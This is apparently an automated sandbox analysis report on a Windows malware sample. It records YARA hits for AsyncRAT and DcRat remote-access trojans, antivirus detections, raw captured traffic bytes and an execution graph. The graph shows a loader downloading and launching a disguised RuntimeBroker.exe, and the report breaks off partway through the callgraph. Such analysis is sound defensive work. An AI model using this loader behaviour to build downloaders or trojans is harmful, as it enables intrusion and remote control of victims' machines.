                                                  2024-09-30 01:24:09 UTC1378INData Raw: 10 00 00 00 00 00 00 b5 b5 00 0d 01 00 00 01 13 30 07 00 d7 01 00 00 12 00 00 11 73 b3 00 00 06 25 72 b9 12 00 70 6f 9e 00 00 06 72 05 19 00 70 6f ab 00 00 06 25 72 1b 19 00 70 6f 9e 00 00 06 7e 0f 00 00 04 6f ab 00 00 06 25 72 25 19 00 70 6f 9e 00 00 06 28 ab 00 00 0a 6f 3c 00 00 0a 6f ab 00 00 06 25 72 2f 19 00 70 6f 9e 00 00 06 73 ba 00 00 0a 28 bb 00 00 0a 6f 3c 00 00 0a 72 35 19 00 70 14 6f bc 00 00 0a 72 49 19 00 70 28 bd 00 00 0a 0a 12 00 28 be 00 00 0a 72 4d 19 00 70 72 57 19 00 70 6f bc 00 00 0a 72 63 19 00 70 72 6f 19 00 70 6f bc 00 00 0a 28 85 00 00 0a 6f ab 00 00 06 25 72 7b 19 00 70 6f 9e 00 00 06 28 48 00 00 06 0a 12 00 28 be 00 00 0a 6f ab 00 00 06 25 72 89 19 00 70 6f 9e 00 00 06 28 73 00 00 0a 6f 74 00 00 0a 6f 75 00 00 0a 6f ab 00 00 06
                                                  Data Ascii: 0s%rporpo%rpo~o%r%po(o<o%r/pos(o<r5porIp((rMprWporcpropo(o%r{po(H(o%rpo(sotouo
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 00 01 10 00 00 00 00 00 00 23 23 00 06 01 00 00 01 1b 30 03 00 1b 00 00 00 00 00 00 00 16 16 16 28 62 00 00 06 dd 0d 00 00 00 26 20 a0 86 01 00 28 16 00 00 0a 2b f4 2a 00 01 10 00 00 00 00 00 00 0d 0d 00 0d 01 00 00 01 1b 30 04 00 41 00 00 00 17 00 00 11 7e 83 00 00 0a 7e 3a 00 00 04 18 6f df 00 00 0a 0a 06 02 03 19 6f e0 00 00 0a 17 0b dd 1e 00 00 00 06 39 06 00 00 00 06 6f 26 00 00 0a dc 6f 57 00 00 0a 28 26 00 00 06 dd 00 00 00 00 16 2a 07 2a 00 00 00 01 1c 00 00 02 00 11 00 10 21 00 0d 00 00 00 00 00 00 00 00 2e 2e 00 0f 3d 00 00 01 1b 30 02 00 42 00 00 00 18 00 00 11 7e 83 00 00 0a 7e 3a 00 00 04 6f d4 00 00 0a 0a 06 02 6f d5 00 00 0a 74 01 00 00 1b 0b dd 1e 00 00 00 06 39 06 00 00 00 06 6f 26 00 00 0a dc 6f 57 00 00 0a 28 26 00 00 06 dd 00 00 00 00
                                                  Data Ascii: ##0(b& (+*0A~~:oo9o&oW(&**!..=0B~~:oot9o&oW(&
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 01 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 18 00 00 00 28 01 00 00 40 01 00 00 0d 00 00 00 00 00 00 00 13 30 03 00 22 00 00 00 1c 00 00 11 17 0a 16 0b 38 11 00 00 00 03 07 91 04 07 91 3b 02 00 00 00 16 0a 07 17 58 0b 07 03 8e 69 32 e9 06 2a 00 00 13 30 03 00 3b 00 00 00 1d 00 00 11 73 b5 00 00 0a 0a 02 0b 16 0c 38 1f 00 00 00 07 08 91 0d 06 72 45 1c 00 70 09 8c 4f 00 00 01 28 fa 00 00 0a 6f b7 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 db 06 6f 3c 00 00 0a 2a 00 13 30 03 00 3b 00 00 00 1d 00 00 11 73 b5 00 00 0a 0a 02 0b 16 0c 38 1f 00 00 00 07 08 91 0d 06 72 55 1c 00 70 09 8c 4f 00 00 01 28 fa 00 00 0a 6f b7 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 db 06 6f 3c 00 00 0a 2a 00 13 30 04 00 2c 00 00 00 1e 00 00 11 02 8e 69 8d 4f 00 00 01 0a 02 8e 69 17 59 0b 16
                                                  Data Ascii: (@0"8;Xi2*0;s8rEpO(o&Xi2o<*0;s8rUpO(o&Xi2o<*0,iOiY
                                                  2024-09-30 01:24:09 UTC1378INData Raw: 00 01 2a 02 7b 49 00 00 04 a5 a5 00 00 01 6c 2a 02 7b 49 00 00 04 a5 89 00 00 01 28 0e 01 00 0a 6c 2a 23 00 00 00 00 00 00 00 00 2a 00 13 30 02 00 a4 00 00 00 23 00 00 11 02 7b 4a 00 00 04 0a 06 1a 59 45 08 00 00 00 16 00 00 00 05 00 00 00 6e 00 00 00 6e 00 00 00 27 00 00 00 38 00 00 00 49 00 00 00 62 00 00 00 38 69 00 00 00 02 7b 49 00 00 04 a5 87 00 00 01 28 fb 00 00 0a 2a 02 7b 49 00 00 04 6f 3c 00 00 0a 28 73 00 00 06 2a 02 7b 49 00 00 04 a5 a4 00 00 01 28 fc 00 00 0a 2a 02 7b 49 00 00 04 a5 a5 00 00 01 28 11 01 00 0a 2a 02 7b 49 00 00 04 a5 89 00 00 01 0b 12 01 28 12 01 00 0a 28 fb 00 00 0a 2a 02 7b 49 00 00 04 74 01 00 00 1b 2a 16 8d 4f 00 00 01 2a 13 30 04 00 4b 00 00 00 24 00 00 11 03 28 87 00 00 0a 39 3e 00 00 00 14 0a 03 19 17 17 73 13 01 00 0a
                                                  Data Ascii: *{Il*{I(l*#*0#{JYEnn'8Ib8i{I(*{Io<(s*{I(*{I(*{I((*{It*O*0K$(9>s


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:21:24:06
                                                  Start date:29/09/2024
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"
                                                  Imagebase:0x7ff651790000
                                                  File size:30'208 bytes
                                                  MD5 hash:E40EB702F369E5DECFB33B3D78BD4B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:21:24:09
                                                  Start date:29/09/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                  Imagebase:0x610000
                                                  File size:49'152 bytes
                                                  MD5 hash:2C417B524AED1DA84F185711E5A478F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: unknown
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 96%, ReversingLabs
                                                  • Detection: 72%, Virustotal, Browse
                                                  Reputation:low
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:16.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:15.9%
                                                    Total number of Nodes:383
                                                    Total number of Limit Nodes:5
                                                    execution_graph 933 7ff651791f00 934 7ff651791f28 933->934 935 7ff651791f19 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 933->935 936 7ff651791fa9 934->936 937 7ff651791f89 934->937 938 7ff651791f5c memmove 934->938 935->934 937->936 939 7ff651791f95 fwrite 937->939 938->936 938->937 939->936 940 7ff651791000 949 7ff651792840 940->949 942 7ff651791015 979 7ff6517913c0 GetUserNameW 942->979 945 7ff651791068 1011 7ff6517935bc 945->1011 946 7ff651791061 _invalid_parameter_noinfo_noreturn 946->945 948 7ff65179106d 950 7ff651792870 949->950 950->950 951 7ff651792974 950->951 952 7ff65179288d 950->952 1023 7ff6517912e0 ?_Xlength_error@std@@YAXPEBD 951->1023 953 7ff651792898 memmove 952->953 959 7ff6517928b9 952->959 955 7ff651792960 953->955 955->942 956 7ff651792979 1024 7ff651791240 956->1024 957 7ff65179292b 961 7ff65179293f memmove 957->961 958 7ff651792937 962 7ff651793340 std::_Facet_Register 3 API calls 958->962 959->956 959->957 959->958 963 7ff6517928e9 959->963 961->955 970 7ff6517928f6 962->970 1014 7ff651793340 963->1014 964 7ff6517929bf 964->942 966 7ff65179297f 966->964 967 7ff6517929b7 966->967 971 7ff6517929d8 _invalid_parameter_noinfo_noreturn 966->971 972 7ff6517935bc free 967->972 969 7ff651792930 _invalid_parameter_noinfo_noreturn 969->958 970->961 973 7ff651792a03 971->973 972->964 974 7ff651792a3e ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 973->974 1027 7ff651792ba0 973->1027 976 7ff651792a4e 974->976 977 7ff651792a5b 974->977 978 7ff6517935bc free 976->978 977->942 978->977 980 7ff65179141f 979->980 981 7ff651792840 22 API calls 980->981 986 7ff65179142b 981->986 982 7ff6517916b1 1083 7ff6517912e0 ?_Xlength_error@std@@YAXPEBD 982->1083 984 7ff651791523 memmove 987 7ff651791565 984->987 986->982 986->984 990 7ff6517916ac 986->990 991 7ff6517914b5 986->991 992 7ff65179150d 986->992 996 7ff651791509 986->996 988 7ff651791583 memmove 987->988 989 7ff6517915bc 987->989 993 7ff6517915ce 988->993 1063 7ff6517930e0 989->1063 995 7ff651791240 Concurrency::cancel_current_task __std_exception_copy 990->995 991->990 998 7ff6517914c2 991->998 997 7ff651793340 std::_Facet_Register 3 API calls 992->997 999 7ff651791640 993->999 1002 7ff65179163b 993->1002 1007 7ff651791634 _invalid_parameter_noinfo_noreturn 993->1007 995->982 996->984 1006 7ff6517914ca 997->1006 1001 7ff651793340 std::_Facet_Register 3 API calls 998->1001 1000 7ff65179167f 999->1000 1004 7ff651791677 999->1004 1008 7ff651791670 _invalid_parameter_noinfo_noreturn 999->1008 1005 7ff651793320 8 API calls 1000->1005 1001->1006 1003 7ff6517935bc free 1002->1003 1003->999 1009 7ff6517935bc free 1004->1009 1010 7ff651791027 1005->1010 1006->996 1006->1007 1007->1002 1008->1004 1009->1000 1010->945 1010->946 1010->948 1012 7ff651793f54 free 1011->1012 1015 7ff65179335a malloc 1014->1015 1016 7ff6517928f1 1015->1016 1017 7ff65179334b 1015->1017 1016->969 1016->970 1017->1015 1018 7ff65179336a 1017->1018 1019 7ff651793375 1018->1019 1033 7ff6517939fc 1018->1033 1021 7ff651791240 Concurrency::cancel_current_task __std_exception_copy 1019->1021 1022 7ff65179337b 1021->1022 1025 7ff65179124e Concurrency::cancel_current_task 1024->1025 1026 7ff65179125f __std_exception_copy 1025->1026 1026->966 1028 7ff651792c15 1027->1028 1030 7ff651792bb7 1027->1030 1029 7ff651792c17 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 1028->1029 1029->974 1037 7ff651792ab0 1030->1037 1032 7ff651792bf1 fclose 1032->1029 1036 7ff6517939dc 1033->1036 1035 7ff651793a0a _CxxThrowException 1036->1035 1038 7ff651792b83 1037->1038 1039 7ff651792ad3 1037->1039 1040 7ff651793320 8 API calls 1038->1040 1039->1038 1041 7ff651792add 1039->1041 1042 7ff651792b92 1040->1042 1043 7ff651792b21 1041->1043 1044 7ff651792af6 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 1041->1044 1042->1032 1049 7ff651793320 1043->1049 1045 7ff651792b1c 1044->1045 1045->1043 1048 7ff651792b57 fwrite 1045->1048 1048->1043 1050 7ff651793329 1049->1050 1051 7ff651792b3e 1050->1051 1052 7ff651793894 IsProcessorFeaturePresent 1050->1052 1051->1032 1053 7ff6517938ac 1052->1053 1058 7ff651793968 RtlCaptureContext 1053->1058 1059 7ff651793982 RtlLookupFunctionEntry 1058->1059 1060 7ff6517938bf 1059->1060 1061 7ff651793998 RtlVirtualUnwind 1059->1061 1062 7ff651793860 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1060->1062 1061->1059 1061->1060 1064 7ff65179328a 1063->1064 1067 7ff65179310e 1063->1067 1084 7ff6517912e0 ?_Xlength_error@std@@YAXPEBD 1064->1084 1066 7ff65179328f 1071 7ff651791240 Concurrency::cancel_current_task __std_exception_copy 1066->1071 1067->1066 1068 7ff651793190 1067->1068 1069 7ff6517931bc 1067->1069 1075 7ff651793174 1067->1075 1068->1066 1070 7ff65179319d 1068->1070 1072 7ff651793340 std::_Facet_Register 3 API calls 1069->1072 1073 7ff651793340 std::_Facet_Register 3 API calls 1070->1073 1074 7ff651793295 1071->1074 1072->1075 1073->1075 1074->993 1076 7ff6517931f0 memmove memmove 1075->1076 1077 7ff651793249 memmove memmove 1075->1077 1079 7ff651793242 _invalid_parameter_noinfo_noreturn 1075->1079 1080 7ff651793220 1076->1080 1081 7ff651793235 1076->1081 1078 7ff651793240 1077->1078 1078->993 1079->1077 1080->1079 1080->1081 1082 7ff6517935bc free 1081->1082 1082->1078 1190 7ff651791140 __std_exception_copy 1191 7ff651791bc0 1192 7ff651791c00 1191->1192 1193 7ff651791bd3 1191->1193 1193->1192 1194 7ff651791be3 fflush 1193->1194 1201 7ff651792740 1202 7ff651792753 1201->1202 1203 7ff65179274c _lock_file 1201->1203 1203->1202 1311 7ff651791080 1312 7ff651792840 22 API calls 1311->1312 1313 7ff651791097 1312->1313 1204 7ff651794442 _seh_filter_exe 1205 7ff6517935c4 1206 7ff6517935e6 1205->1206 1207 7ff6517935dc 1205->1207 1208 7ff6517935bc free 1207->1208 1208->1206 1209 7ff6517936b8 1213 7ff651793ee8 SetUnhandledExceptionFilter 1209->1213 1314 7ff651793ef8 1315 7ff651793f2c 1314->1315 1316 7ff651793f10 1314->1316 1316->1315 1317 7ff6517941a4 free 1316->1317 1318 7ff6517937fc 1319 7ff651793e94 GetModuleHandleW 1318->1319 1320 7ff651793803 1319->1320 1321 7ff651793807 1320->1321 1322 7ff65179383d _exit 1320->1322 1220 7ff6517927d0 1221 7ff6517927e3 1220->1221 1222 7ff651792814 1220->1222 1223 7ff65179280c 1221->1223 1224 7ff65179282b _invalid_parameter_noinfo_noreturn 1221->1224 1225 7ff6517935bc free 1223->1225 1225->1222 1226 7ff651791fd0 1227 7ff651791ff2 1226->1227 1228 7ff651791fe7 1226->1228 1229 7ff651792008 1227->1229 1230 7ff651791ff9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 1227->1230 1231 7ff65179202d memmove 1229->1231 1234 7ff651792062 1229->1234 1230->1229 1231->1234 1232 7ff6517920fe 1233 7ff6517920de 1233->1232 1236 7ff6517920e3 fread 1233->1236 1234->1232 1234->1233 1235 7ff6517920b0 fread 1234->1235 1235->1232 1235->1234 1236->1232 1323 7ff651794410 ??1_Lockit@std@@QEAA 1324 7ff651791d10 1325 7ff651791d46 1324->1325 1331 7ff651791d65 1324->1331 1326 7ff651792ab0 10 API calls 1325->1326 1328 7ff651791d4b 1326->1328 1327 7ff651793320 8 API calls 1329 7ff651791ddb 1327->1329 1330 7ff651791d4f fsetpos 1328->1330 1328->1331 1330->1331 1331->1327 1332 7ff651791c10 1333 7ff651791c33 1332->1333 1334 7ff651791ccf 1333->1334 1335 7ff651791c51 setvbuf 1333->1335 1338 7ff651793320 8 API calls 1334->1338 1335->1334 1336 7ff651791c5f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 1335->1336 1336->1334 1337 7ff651791c81 _get_stream_buffer_pointers 1336->1337 1337->1334 1339 7ff651791cfe 1338->1339 1085 7ff6517936d4 1086 7ff6517936e8 1085->1086 1087 7ff651793820 1086->1087 1088 7ff6517936f0 __scrt_acquire_startup_lock 1086->1088 1117 7ff651793d04 IsProcessorFeaturePresent 1087->1117 1090 7ff65179382a 1088->1090 1095 7ff65179370e __scrt_release_startup_lock 1088->1095 1091 7ff651793d04 9 API calls 1090->1091 1092 7ff651793835 1091->1092 1094 7ff65179383d _exit 1092->1094 1093 7ff651793733 1095->1093 1096 7ff6517937b9 1095->1096 1099 7ff6517937b1 _register_thread_local_exe_atexit_callback 1095->1099 1107 7ff651793e4c memset GetStartupInfoW 1096->1107 1098 7ff6517937be _get_narrow_winmain_command_line 1108 7ff651791b60 1098->1108 1099->1096 1107->1098 1123 7ff651791a00 1108->1123 1118 7ff651793d2a 1117->1118 1119 7ff651793d38 memset RtlCaptureContext RtlLookupFunctionEntry 1118->1119 1120 7ff651793dae memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1119->1120 1121 7ff651793d72 RtlVirtualUnwind 1119->1121 1122 7ff651793e2e 1120->1122 1121->1120 1122->1090 1134 7ff651791a40 1123->1134 1124 7ff651791a95 GetFileAttributesW 1124->1134 1125 7ff651791a4c OpenProcess 1125->1124 1126 7ff651791a61 GetExitCodeProcess 1125->1126 1127 7ff651791a8f CloseHandle 1126->1127 1128 7ff651791a75 CloseHandle 1126->1128 1127->1124 1132 7ff651791b4c SleepEx 1128->1132 1133 7ff651791a8d 1128->1133 1129 7ff651791ac4 CreateProcessW 1131 7ff651791b2f CloseHandle CloseHandle 1129->1131 1129->1132 1131->1132 1132->1134 1133->1124 1134->1124 1134->1125 1134->1129 1134->1132 1135 7ff6517916c0 1134->1135 1158 7ff6517942c0 1135->1158 1138 7ff65179171e InternetOpenUrlW 1140 7ff65179176d 1138->1140 1141 7ff65179175d InternetCloseHandle 1138->1141 1139 7ff651791766 1142 7ff651793320 8 API calls 1139->1142 1160 7ff651792c60 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH 1140->1160 1141->1139 1143 7ff651791927 1142->1143 1143->1134 1146 7ff6517917d2 InternetCloseHandle InternetCloseHandle 1148 7ff651791888 1146->1148 1147 7ff6517917e8 InternetReadFile 1149 7ff651791846 1147->1149 1150 7ff651791809 1147->1150 1154 7ff6517918f4 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 1148->1154 1157 7ff651792ba0 12 API calls 1148->1157 1151 7ff651792ba0 12 API calls 1149->1151 1150->1149 1152 7ff651791818 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J InternetReadFile 1150->1152 1153 7ff651791850 1151->1153 1152->1149 1152->1150 1155 7ff651791874 InternetCloseHandle InternetCloseHandle 1153->1155 1156 7ff651791855 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 1153->1156 1154->1139 1155->1148 1156->1155 1157->1154 1159 7ff6517916e2 InternetOpenW 1158->1159 1159->1138 1159->1139 1161 7ff651792d45 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 1160->1161 1162 7ff651792e1b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 1160->1162 1169 7ff651792e60 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 1161->1169 1163 7ff651792de1 1162->1163 1165 7ff651793320 8 API calls 1163->1165 1167 7ff6517917a0 1165->1167 1167->1146 1167->1147 1168 7ff651792de7 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 1168->1163 1170 7ff651792ec2 1169->1170 1171 7ff651792f37 ??1_Lockit@std@@QEAA 1170->1171 1173 7ff651792ed9 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 1170->1173 1174 7ff651792ee5 1170->1174 1172 7ff651793320 8 API calls 1171->1172 1175 7ff651792dd1 ?always_noconv@codecvt_base@std@ 1172->1175 1173->1174 1174->1171 1176 7ff651792efc ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 1174->1176 1175->1163 1175->1168 1177 7ff651792f10 1176->1177 1178 7ff651792f67 1176->1178 1183 7ff6517932c8 1177->1183 1186 7ff651791330 1178->1186 1182 7ff651792f6c 1184 7ff651793340 std::_Facet_Register 3 API calls 1183->1184 1185 7ff651792f22 1184->1185 1185->1171 1189 7ff651791300 1186->1189 1188 7ff65179133e _CxxThrowException __std_exception_copy 1188->1182 1189->1188 1237 7ff651793848 1240 7ff651793f5c 1237->1240 1241 7ff651793f7f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1240->1241 1242 7ff651793851 1240->1242 1241->1242 1243 7ff6517943de ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 1244 7ff651794460 1245 7ff651794471 1244->1245 1246 7ff6517944ad 1244->1246 1247 7ff6517944a8 1245->1247 1248 7ff6517944a1 _invalid_parameter_noinfo_noreturn 1245->1248 1249 7ff6517935bc free 1247->1249 1248->1247 1249->1246 1250 7ff651792560 1251 7ff651792586 1250->1251 1253 7ff65179258d 1250->1253 1252 7ff651793320 8 API calls 1251->1252 1254 7ff651792706 1252->1254 1253->1251 1255 7ff651792613 fputc 1253->1255 1256 7ff651792635 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 1253->1256 1255->1251 1257 7ff6517926a4 1256->1257 1258 7ff65179267a 1256->1258 1257->1251 1260 7ff6517926b3 fwrite 1257->1260 1258->1257 1259 7ff65179267f 1258->1259 1259->1251 1261 7ff651792684 fputc 1259->1261 1260->1251 1261->1251 1262 7ff651792760 1263 7ff65179277d 1262->1263 1264 7ff6517927ba ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 1263->1264 1265 7ff651792ba0 12 API calls 1263->1265 1265->1264 1340 7ff651792120 1341 7ff651792157 1340->1341 1343 7ff6517921ee fgetc 1341->1343 1344 7ff6517921d2 fgetc 1341->1344 1346 7ff651792167 1341->1346 1342 7ff651793320 8 API calls 1345 7ff6517923db 1342->1345 1348 7ff651792320 1343->1348 1352 7ff65179221b 1343->1352 1344->1346 1346->1342 1347 7ff6517923c8 1351 7ff6517935bc free 1347->1351 1348->1346 1348->1347 1353 7ff65179235f _invalid_parameter_noinfo_noreturn 1348->1353 1349 7ff65179225a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 1349->1352 1351->1346 1352->1348 1352->1349 1354 7ff6517922cd memmove fgetc 1352->1354 1355 7ff65179237e 1352->1355 1357 7ff651792f70 1352->1357 1353->1348 1354->1348 1354->1352 1355->1348 1356 7ff6517923a0 ungetc 1355->1356 1356->1348 1356->1355 1358 7ff6517930c5 1357->1358 1360 7ff651792f9f 1357->1360 1377 7ff6517912e0 ?_Xlength_error@std@@YAXPEBD 1358->1377 1363 7ff651792fea 1360->1363 1364 7ff65179302f 1360->1364 1365 7ff651792ff7 1360->1365 1367 7ff651793004 1360->1367 1361 7ff651793340 std::_Facet_Register 3 API calls 1361->1363 1362 7ff6517930ca 1366 7ff651791240 Concurrency::cancel_current_task __std_exception_copy 1362->1366 1368 7ff65179308e _invalid_parameter_noinfo_noreturn 1363->1368 1371 7ff651793095 memmove 1363->1371 1372 7ff65179304b memmove 1363->1372 1369 7ff651793340 std::_Facet_Register 3 API calls 1364->1369 1365->1362 1365->1367 1370 7ff6517930d0 1366->1370 1367->1361 1368->1371 1369->1363 1373 7ff65179308c 1371->1373 1374 7ff651793081 1372->1374 1375 7ff65179306c 1372->1375 1373->1349 1376 7ff6517935bc free 1374->1376 1375->1368 1375->1374 1376->1373 1378 7ff651792720 1379 7ff651792733 1378->1379 1380 7ff65179272c _unlock_file 1378->1380 1380->1379 1381 7ff6517911a0 __std_exception_destroy 1382 7ff6517911d5 1381->1382 1383 7ff6517911c8 1381->1383 1384 7ff6517935bc free 1383->1384 1384->1382 1266 7ff6517935f0 1267 7ff651793600 1266->1267 1279 7ff6517933f4 1267->1279 1269 7ff651793d04 9 API calls 1270 7ff6517936a5 1269->1270 1271 7ff651793624 _RTC_Initialize 1277 7ff651793687 1271->1277 1287 7ff651794010 InitializeSListHead 1271->1287 1277->1269 1278 7ff651793695 1277->1278 1280 7ff651793405 1279->1280 1281 7ff651793437 1279->1281 1282 7ff651793474 1280->1282 1285 7ff65179340a __scrt_release_startup_lock 1280->1285 1281->1271 1283 7ff651793d04 9 API calls 1282->1283 1284 7ff65179347e 1283->1284 1285->1281 1286 7ff651793427 _initialize_onexit_table 1285->1286 1286->1281 1288 7ff651791df0 1289 7ff651791e23 1288->1289 1290 7ff651792ab0 10 API calls 1289->1290 1296 7ff651791e81 1289->1296 1292 7ff651791e46 1290->1292 1291 7ff651793320 8 API calls 1293 7ff651791eeb 1291->1293 1294 7ff651791e54 _fseeki64 1292->1294 1295 7ff651791e6b fgetpos 1292->1295 1292->1296 1294->1295 1294->1296 1295->1296 1296->1291 1297 7ff6517911f0 __std_exception_destroy 1298 7ff651792470 1299 7ff65179248b 1298->1299 1300 7ff6517924a1 1299->1300 1301 7ff6517924db ungetc 1299->1301 1301->1300 1302 7ff651792a70 1307 7ff651791940 1302->1307 1308 7ff651791996 1307->1308 1309 7ff6517919d3 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 1308->1309 1310 7ff651792ba0 12 API calls 1308->1310 1310->1309 1386 7ff6517943b0 1387 7ff6517943c3 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 1386->1387 1388 7ff6517943d8 1386->1388 1387->1388 1389 7ff651794228 1390 7ff651794260 __GSHandlerCheckCommon 1389->1390 1391 7ff65179427b __CxxFrameHandler4 1390->1391 1392 7ff65179428c 1390->1392 1391->1392 1393 7ff6517945ac 1395 7ff6517945b4 1393->1395 1394 7ff651794601 1395->1394 1396 7ff6517935bc free 1395->1396 1396->1395

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00007FF6517913C0 7 Function_00007FF6517935BC 0->7 15 Function_00007FF6517912E0 0->15 16 Function_00007FF6517930E0 0->16 45 Function_00007FF651793320 0->45 58 Function_00007FF651793340 0->58 59 Function_00007FF651791240 0->59 63 Function_00007FF651792840 0->63 1 Function_00007FF6517916C0 2 Function_00007FF6517942C0 1->2 1->45 73 Function_00007FF651792C60 1->73 98 Function_00007FF651792BA0 1->98 3 Function_00007FF651791BC0 4 Function_00007FF6517935C4 4->7 5 Function_00007FF6517933B8 48 Function_00007FF651794020 5->48 51 Function_00007FF651793A1C 5->51 6 Function_00007FF6517936B8 24 Function_00007FF651793EE8 6->24 94 Function_00007FF651793E90 6->94 8 Function_00007FF6517944D0 8->7 9 Function_00007FF6517927D0 9->7 10 Function_00007FF651791FD0 11 Function_00007FF6517936D4 11->5 32 Function_00007FF651793D04 11->32 50 Function_00007FF651793518 11->50 65 Function_00007FF65179353C 11->65 68 Function_00007FF651793E4C 11->68 72 Function_00007FF651791B60 11->72 77 Function_00007FF651794064 11->77 80 Function_00007FF65179405C 11->80 90 Function_00007FF651793480 11->90 92 Function_00007FF65179337C 11->92 96 Function_00007FF651793E94 11->96 12 Function_00007FF6517932C8 12->58 13 Function_00007FF6517941CC 14 Function_00007FF6517943DE 16->7 16->15 16->58 16->59 17 Function_00007FF6517939DC 18 Function_00007FF6517943F0 19 Function_00007FF6517935F0 23 